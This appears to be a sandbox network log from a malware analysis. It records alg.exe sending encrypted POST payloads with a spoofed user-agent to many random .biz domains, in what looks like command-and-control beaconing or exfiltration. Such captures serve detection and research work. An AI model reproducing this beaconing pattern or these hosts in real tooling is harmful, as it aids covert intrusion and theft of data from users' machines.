Jan 10, 2025 16:01:36.164583921 CET	164	IN	Data Raw: 20 20 20 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 27 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 6d 61 57 78 73 Data Ascii: height: 24px; background-image: url('data:image/svg+xml;base64,PHN2ZyBmaWxsPScjRDdEN0Q3JyBzdHlsZT0iZmxvYXQ6IHJpZ2h0IiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC
Jan 10, 2025 16:01:36.164634943 CET	1236	IN	Data Raw: 39 7a 64 6d 63 69 49 47 68 6c 61 57 64 6f 64 44 30 69 4d 6a 51 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 6a 41 67 4d 43 41 79 4e 43 41 79 4e 43 49 67 64 32 6c 6b 64 47 67 39 49 6a 49 30 49 6a 34 38 63 47 46 30 61 43 42 6b 50 53 4a 4e 4d 43 41 77 Data Ascii: 9zdmciIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgd2lkdGg9IjI0Ij48cGF0aCBkPSJNMCAwaDI0djI0SDB6IiBmaWxsPSJub25lIi8+PHBhdGggZD0iTTUuODggNC4xMkwxMy43NiAxMmwtNy44OCA3Ljg4TDggMjJsMTAtMTBMOCAyeiIvPjwvc3ZnPg==');}</style> <meta name="og:descript
Jan 10, 2025 16:01:36.164690018 CET	1236	IN	Data Raw: 30 2c 6d 65 6e 75 62 61 72 3d 6e 6f 2c 73 74 61 74 75 73 3d 79 65 73 2c 74 6f 6f 6c 62 61 72 3d 6e 6f 27 29 2e 66 6f 63 75 73 28 29 22 20 63 6c 61 73 73 3d 22 70 72 69 76 61 63 79 2d 70 6f 6c 69 63 79 22 3e 0a 20 20 20 20 50 72 69 76 61 63 79 20 Data Ascii: 0,menubar=no,status=yes,toolbar=no').focus()" class="privacy-policy"> Privacy Policy</a><br/><br/><br/><br/> </div></div><script type="text/javascript" language="JavaScript"> var tcblock = { // Required and steady
Jan 10, 2025 16:01:36.164724112 CET	448	IN	Data Raw: 72 4e 61 6d 65 73 3d 5b 5d 3b 20 20 20 20 20 20 20 20 20 6c 65 74 20 75 6e 69 71 75 65 54 72 61 63 6b 69 6e 67 49 44 3d 27 4d 54 63 7a 4e 6a 55 79 4d 54 49 35 4e 53 34 35 4e 6a 67 35 4f 6a 6b 79 4d 57 46 6d 4d 6a 52 6c 5a 6a 6b 31 5a 6a 41 32 5a Data Ascii: rNames=[]; let uniqueTrackingID='MTczNjUyMTI5NS45Njg5OjkyMWFmMjRlZjk1ZjA2ZGMzOTNkZTNlODJhOTNlNjIzNTdlNDU1ZjkzM2RlYTM0MjNjZDY5ZjBkYjY1MTdjZWU6Njc4MTM2NGZlYzhhMg=='; let search=''; let themedata='fENsZWFuUGVwcGVybWludEJsY
Jan 10, 2025 16:01:36.164778948 CET	1236	IN	Data Raw: 30 7a 51 6d 39 38 59 57 51 33 4d 32 45 35 4e 6a 64 69 4e 47 45 7a 4f 54 68 6c 4f 47 55 78 4e 32 59 30 4f 44 64 6b 4f 44 51 30 59 57 45 33 5a 54 55 35 59 54 4d 78 4e 44 46 6d 5a 58 77 77 66 44 42 38 66 44 42 38 66 48 77 77 66 44 42 38 56 7a 45 77 Data Ascii: 0zQm98YWQ3M2E5NjdiNGEzOThlOGUxN2Y0ODdkODQ0YWE3ZTU5YTMxNDFmZXwwfDB8fDB8fHwwfDB8VzEwPXx8MXxXMTA9fDNhZmViZDY4ODUwOGZmYTczYzA3M2RhMzczNzcwZDg4YzJkMDBkYjd8MHxkcC10ZWFtaW50ZXJuZXQxMl8zcGh8MHwwfHx8fA=='; let domain='przvgke.biz'; let
Jan 10, 2025 16:01:36.169940948 CET	1236	IN	Data Raw: 4f 70 74 69 6f 6e 73 3a 20 63 61 6c 6c 62 61 63 6b 4f 70 74 69 6f 6e 73 2c 74 65 72 6d 73 3a 20 70 61 67 65 4f 70 74 69 6f 6e 73 2e 74 65 72 6d 73 7d 3b 69 66 20 28 21 61 64 73 4c 6f 61 64 65 64 20 7c 7c 20 28 63 6f 6e 74 61 69 6e 65 72 4e 61 6d Data Ascii: Options: callbackOptions,terms: pageOptions.terms};if (!adsLoaded \|\| (containerName in containerNames)) {ajaxQuery(scriptPath + "/track.php"+ "?toggle=adloaded"+ "&uid=" + encodeURIComponent(uniqueTrackingID)+ "&domain=" + encodeURIComponent(d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49740	199.59.243.228	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:01:36.515223980 CET	350	OUT	GET /f?usid=25&utid=8703404831 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww7.przvgke.biz
Jan 10, 2025 16:01:36.995902061 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 15:01:36 GMT content-type: text/html; charset=utf-8 content-length: 1126 x-request-id: 911a62f3-d24d-4604-bc28-41384a22b86f cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_geEntrXRfxicqnvitt9lJNj7ukvKEDdTdkNVdzqk+mcqEYGCGN8YS9qX27xz6BG1J2GSWvfoUPy3ugNuhDcuSw== set-cookie: parking_session=911a62f3-d24d-4604-bc28-41384a22b86f; expires=Fri, 10 Jan 2025 15:16:36 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 67 65 45 6e 74 72 58 52 66 78 69 63 71 6e 76 69 74 74 39 6c 4a 4e 6a 37 75 6b 76 4b 45 44 64 54 64 6b 4e 56 64 7a 71 6b 2b 6d 63 71 45 59 47 43 47 4e 38 59 53 39 71 58 32 37 78 7a 36 42 47 31 4a 32 47 53 57 76 66 6f 55 50 79 33 75 67 4e 75 68 44 63 75 53 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_geEntrXRfxicqnvitt9lJNj7ukvKEDdTdkNVdzqk+mcqEYGCGN8YS9qX27xz6BG1J2GSWvfoUPy3ugNuhDcuSw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Jan 10, 2025 16:01:36.995929003 CET	560	IN	Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTExYTYyZjMtZDI0ZC00NjA0LWJjMjgtNDEzODRhMjJiODZmIiwicGFnZV90aW1lIjoxNzM2NTIxMjk2LCJwYWdlX3VybCI6I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49741	18.141.10.107	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:01:37.134337902 CET	358	OUT	POST /hspwddpejltixn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:01:37.134367943 CET	770	OUT	Data Raw: b2 01 93 50 f0 fb c7 8a f6 02 00 00 28 55 ea 2a 65 df 2e e5 98 a0 72 2c 61 70 c8 9a 5a 1b 4f 45 14 00 8c 73 46 a1 1b 26 4a 4c bc 9d e8 64 69 4c a5 f6 43 8b 24 cf 12 5b 57 f2 a8 e8 6f da ff 05 db c4 67 bd 0e 0a 7f 00 65 2c d1 c8 be 07 f5 a3 b1 d7 Data Ascii: P(Ue.r,apZOEsF&JLdiLC$[Woge,.(u]d$8!/5phEea8=b\|daT<RGCg[[JgV"6yy<6"}x<jjcyvGxYuu()>I\+OXn3[X;
Jan 10, 2025 16:01:38.504878044 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:01:38 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=5cb06b67d58c45fb000b741bda36dd29\|8.46.123.189\|1736521298\|1736521298\|0\|1\|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49742	82.112.184.197	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:01:38.782407999 CET	355	OUT	POST /elhlcfwgsepqd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:01:38.782407999 CET	770	OUT	Data Raw: 1d 29 cc be c7 be 93 15 f6 02 00 00 2a e2 22 4d b1 37 fa 35 fb 57 41 06 d4 22 f9 7e d3 7c 50 ac e5 0b 77 20 75 b2 9e db 08 3c 99 ca c6 b2 e5 bc b7 10 a2 c7 43 eb 08 5d c4 08 fc a5 56 75 29 64 45 be fd 3f 47 5d a3 bd 72 2c b9 e4 8c de 58 90 0d 8e Data Ascii: )"M75WA"~\|Pw u<C]Vu)dE?G]r,XPys\NM(gCO\w7Gp;Dh\I7\|u90(O)3ms9\OPx{%1/CY`t:]6(mv>%t=4?\|V/!(>=3?TUI)0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49744	82.112.184.197	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:01:39.160856009 CET	344	OUT	POST /ea HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:01:39.160895109 CET	770	OUT	Data Raw: 31 4d 61 9c 74 85 f5 6f f6 02 00 00 3a 79 47 e1 66 19 37 cb 7b c1 29 4c 82 ac d2 51 b5 4a 89 e8 7a ef 3d af 0e 04 4e 9b 20 36 99 19 8e b7 8c 3e b9 d3 6f 91 97 91 1c c5 e0 fb 38 73 b8 09 95 fa 5b 97 c2 3b 0e cf 8a ba c0 27 f4 6a de 79 72 05 0a f2 Data Ascii: 1Mato:yGf7{)LQJz=N 6>o8s[;'jyr`=sO}_\2`A7CGD[}:d!ZmGX^zZ;/vN!I/_f.mUsdmaZdsWI3"5G1^n6=cKa5b_k

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49750	82.112.184.197	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:01:43.251297951 CET	354	OUT	POST /jbavyixtd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:01:43.251297951 CET	770	OUT	Data Raw: e7 06 a7 77 de 54 5b bd f6 02 00 00 13 3b b5 91 0c 94 0c 53 c1 fa ed 22 c7 57 01 22 37 f8 10 40 dd ea 9a bb a4 08 b4 9d 4f c0 15 2c 41 c8 4e 1d b5 71 4a 68 29 99 d3 4f 4c 7a bb 4b 4c a9 8e 5c 4f 06 a9 3a f7 99 68 3f 45 a1 ca 19 eb 0d 82 58 7c 02 Data Ascii: wT[;S"W"7@O,ANqJh)OLzKL\O:h?EX\|x^:9O,[RE].H&j;@;L2zW,/9Y25=1A- ?d%hkqQ%hQ:pW1,nsI#ry0^S<'H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49751	82.112.184.197	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:01:47.237782955 CET	350	OUT	POST /kjfhq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:01:47.237835884 CET	770	OUT	Data Raw: 04 80 2f a8 df cb 01 61 f6 02 00 00 16 2f 85 7a 9f e0 f6 5a b6 44 98 61 e8 aa 3d e8 39 63 27 a4 a2 a7 2f 77 f0 96 50 4d 13 af 2f 5b 19 af 45 9e 6d b1 74 7f 20 35 da 8a 82 f7 22 22 a7 87 37 b2 db 26 a9 fd 5b a1 e3 ce 48 0e 57 50 bb 51 ae 22 ef ba Data Ascii: /a/zZDa=9c'/wPM/[Emt 5""7&[HWPQ":P6Q@rcm7GA7H/+&<&y(0'k=)=+hyGo3"+q.B\b]_5'`KAl,t:1]4wXj8#MX:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49752	47.129.31.212	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:01:51.254723072 CET	356	OUT	POST /ikqjeeswprlgw HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: xlfhhhm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:01:51.254740000 CET	770	OUT	Data Raw: 87 8b f5 c3 e7 c2 8c 8a f6 02 00 00 9a 96 31 1a 43 76 2a a9 a1 49 1f fd 28 a0 94 44 b5 60 ad b3 dd 71 99 ed 0c 79 ee c8 33 24 99 16 83 9d ad 05 4a 24 94 82 f4 e7 07 62 ad 4b da 14 ea af d8 5d 11 ad 11 65 84 18 5b f2 f5 4f 73 da 6c 68 e7 6e c0 59 Data Ascii: 1Cv*I(D`qy3$J$bK]e[OslhnYALs]X$e 0AmG-oit$6@^op'OyYL'uFoBm%JMNl2tCa3Nu"IQC#STCTQU&xp\/{K?
Jan 10, 2025 16:01:52.641207933 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:01:52 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=6a6669ad4ffd4ce006216ac841fdb6c0\|8.46.123.189\|1736521312\|1736521312\|0\|1\|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49753	13.251.16.150	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:01:52.915965080 CET	348	OUT	POST /lehnxi HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ifsaia.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:01:52.916004896 CET	770	OUT	Data Raw: 3e 1b 8b 10 2e 40 79 70 f6 02 00 00 a7 de 93 92 56 5a 9f 0d 66 90 3e 10 12 66 49 7a b5 14 17 c3 10 de 44 09 dd c5 33 01 cd fa d9 82 4d cf 23 c9 ba f3 44 b0 da 3d 25 52 ca f5 f4 b5 66 45 7c ac 0d ed f0 9d e2 81 03 53 10 ea 82 f9 ff 04 26 ec 1c 67 Data Ascii: >.@ypVZf>fIzD3M#D=%RfE\|S&g9(u{Sx1oj8\|`vV!"U%Ld/7'0S~}5[Ez4\DV7d!Oa\'U"*S'1W_UxE=l?<q
Jan 10, 2025 16:01:54.319830894 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:01:54 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=fa4066ecb65b6f0b4a95182074bea075\|8.46.123.189\|1736521314\|1736521314\|0\|1\|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49754	44.221.84.105	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:01:54.653882027 CET	353	OUT	POST /lnavxpry HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: saytjshyf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:01:54.653913975 CET	770	OUT	Data Raw: 5c c4 65 6a 4e b6 77 b9 f6 02 00 00 10 8d fb f0 bb 55 8c c6 52 e1 3c 6b 01 c7 a3 a5 c9 eb 28 65 cf 60 9c f1 5c ee a3 17 da 8b 95 d4 df 2c 82 a9 fe ea 19 77 35 9e 0e 00 da 55 85 ff 60 94 37 d6 84 3b 3e c2 bc 45 76 67 b9 16 99 81 4b c3 7b 19 18 92 Data Ascii: \ejNwUR<k(e`\,w5U`7;>EvgK{hCASF&lYvh'JwZnMH$t'a'ga!A?Vb2h!bnTurf^RVyPD&I-eyE`CG1to$/aw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49755	44.221.84.105	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:01:55.205845118 CET	349	OUT	POST /yyix HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: saytjshyf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:01:55.205869913 CET	770	OUT	Data Raw: d3 47 32 c8 75 d6 66 cb f6 02 00 00 e3 c2 00 6c a6 f2 2e 21 c5 41 98 43 50 9c 5d 75 c4 ff 5c 96 71 26 bb 7f 15 f2 31 5c 90 b4 cd d0 51 80 e8 d1 fd 99 dd 72 c9 23 ba 69 7a 3c 22 97 8e ee 0a 6f e8 65 6a c7 c2 70 58 73 d0 0e de b7 17 b2 7c 91 91 e1 Data Ascii: G2ufl.!ACP]u\q&1\Qr#iz<"oejpXs\|(vo3RBB-5j~y5T:&c9x~tA)ha?&;@Qxe%p>M&GGwJy2"V)-r7Dlbz
Jan 10, 2025 16:01:55.665226936 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:01:55 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=9cb09685c7d7af881dfa78105184f554\|8.46.123.189\|1736521315\|1736521315\|0\|1\|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49756	18.141.10.107	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:01:55.862947941 CET	358	OUT	POST /ckodyopddikmhbc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vcddkls.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:01:55.863025904 CET	770	OUT	Data Raw: c8 e1 dd c3 6d 8b 50 5b f6 02 00 00 19 11 9f 47 f5 b2 e9 91 c2 92 87 84 97 7f ea f2 3c 9e 7c 33 13 05 de 29 31 58 8a 5f 6b a5 2c 43 d1 67 46 b9 84 6e 13 c4 9a 6c a4 f7 b3 e0 bb 37 b4 a9 56 dd 5f 43 f1 fc 84 90 7f 68 99 49 4f e7 d0 1c 7a b0 28 fb Data Ascii: mP[G<\|3)1X_k,CgFnl7V_ChIOz(llB'=];I$C dQ){>+vO3%k 0/st3=]~"2R\|B20?L"KYg<58.58&vG<lwq0B
Jan 10, 2025 16:01:57.236938000 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:01:56 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=fbd32582ea8d919b70b875fbe93f6bbe\|8.46.123.189\|1736521316\|1736521316\|0\|1\|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49758	72.52.178.23	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:01:58.314157963 CET	343	OUT	POST /yq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: fwiwk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:01:58.314256907 CET	770	OUT	Data Raw: 2a 12 c4 1a c7 e6 84 6d f6 02 00 00 30 fd a8 8c 66 08 86 30 0b 72 6b f8 a5 db 41 62 b2 48 09 e9 f9 a4 4d 79 a2 a6 f3 66 54 a9 ad be b6 5a 83 06 3b 20 ec 18 61 a7 e8 e5 d6 c5 30 78 2b df e6 10 d9 6e f3 f6 f8 13 52 1c d9 69 c1 88 32 67 16 60 60 7c Data Ascii: *m0f0rkAbHMyfTZ; a0x+nRi2g``\|9)DQ-S{f4i}}OKHFv%9XVtK1/]A%= N}x&+Vbv{eA'F-zu6im?:"ttSb/ v
Jan 10, 2025 16:01:58.837039948 CET	273	IN	HTTP/1.1 302 Moved Temporarily Date: Fri, 10 Jan 2025 15:01:58 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Location: http://ww7.fwiwk.biz/yq?usid=25&utid=8703410378 Cache-Control: no-cache Pragma: no-cache Access-Control-Allow-Origin: *
Jan 10, 2025 16:01:59.648789883 CET	357	OUT	POST /tlrsmavbccvnwuep HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: fwiwk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:01:59.648833990 CET	770	OUT	Data Raw: 7f ff 65 75 aa 50 41 b6 f6 02 00 00 ae 51 38 74 d4 0a d2 82 65 f7 5b a7 68 e2 84 5c 1e 0d c1 cd 09 93 21 27 c8 7b 5b 5b 00 a9 77 02 e9 e1 3f 80 9b c0 34 65 6e a3 26 47 25 58 51 28 4b f5 a9 83 d0 47 b5 2f 3f 50 36 b7 76 f8 71 43 8a 04 44 b4 df 87 Data Ascii: euPAQ8te[h\!'{[[w?4en&G%XQ(KG/?P6vqCD.Q$jO[Az/;}d{oh[7,dj)~ W_i'GkJJ8`{,%:cuL<@0s.FLv>jf*+
Jan 10, 2025 16:01:59.789016008 CET	287	IN	HTTP/1.1 302 Moved Temporarily Date: Fri, 10 Jan 2025 15:01:59 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Location: http://ww7.fwiwk.biz/tlrsmavbccvnwuep?usid=25&utid=8703410598 Cache-Control: no-cache Pragma: no-cache Access-Control-Allow-Origin: *

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49759	199.59.243.228	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:01:58.869405031 CET	349	OUT	GET /yq?usid=25&utid=8703410378 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww7.fwiwk.biz
